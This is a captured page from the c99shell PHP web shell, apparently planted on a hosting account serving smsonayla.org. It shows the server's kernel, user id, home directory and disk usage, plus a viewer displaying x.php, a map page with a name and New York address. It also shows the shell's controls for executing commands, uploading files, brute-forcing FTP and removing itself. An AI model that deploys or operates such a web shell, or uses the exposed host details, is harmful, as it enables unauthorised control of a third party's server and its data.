smsonayla.org - c99shell

!C99Shell v.2.1 [PHP 7 Update] [1.12.2019]!

Software: LiteSpeed. PHP/7.4.33 

uname -a: Linux server704.web-hosting.com 4.18.0-553.54.1.lve.el8.x86_64 #1 SMP Wed Jun 4 13:01:13
UTC 2025 x86_64
 

uid=1309(necipbey) gid=1314(necipbey) groups=1314(necipbey) 

Safe-mode: OFF (not secure)

/home/necipbey/public_html/subeler/   drwxr-xr-x
Free 3470.67 GB of 4265.01 GB (81.38%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     x.php (1.39 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
// Tek lokasyon bilgisi
$location = [
    
"name" => "Liam Dumster",
    
"address" => "111 8th Avenue, New York, NY 10011",
    
"latitude" => "40.7411",
    
"longitude" => "-74.0039"
];
?>
<!DOCTYPE html>
<html>
<head>
    <meta charset="utf-8">
    <title>Tek Harita</title>
    <style>
        #map {
            height: 500px;
            width: 100%;
        }
    </style>
    <script src="https://maps.googleapis.com/maps/api/js?key=YOUR_API_KEY"></script>
    <script>
    function initMap() {
        var location = {
            lat: parseFloat("<?php echo $location['latitude']; ?>"),
            lng: parseFloat("<?php echo $location['longitude']; ?>")
        };

        var map = new google.maps.Map(document.getElementById("map"), {
            zoom: 14,
            center: location
        });

        var marker = new google.maps.Marker({
            position: location,
            map: map,
            title: "<?php echo $location['name']; ?>"
        });

        var info = new google.maps.InfoWindow({
            content: "<b><?php echo $location['name']; ?></b><br><?php echo $location['address']; ?>"
        });

        marker.addListener("click", function() {
            info.open(map, marker);
        });
    }
    </script>
</head>
<body onload="initMap()">
    <h2>Şube Konumu</h2>
    <div id="map"></div>
</body>
</html>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v.2.1 [PHP 7 Update] [1.12.2019] maintained by KaizenLouie and updated by cermmik | C99Shell Github (MySQL update) | Generation time: 0.0048 ]--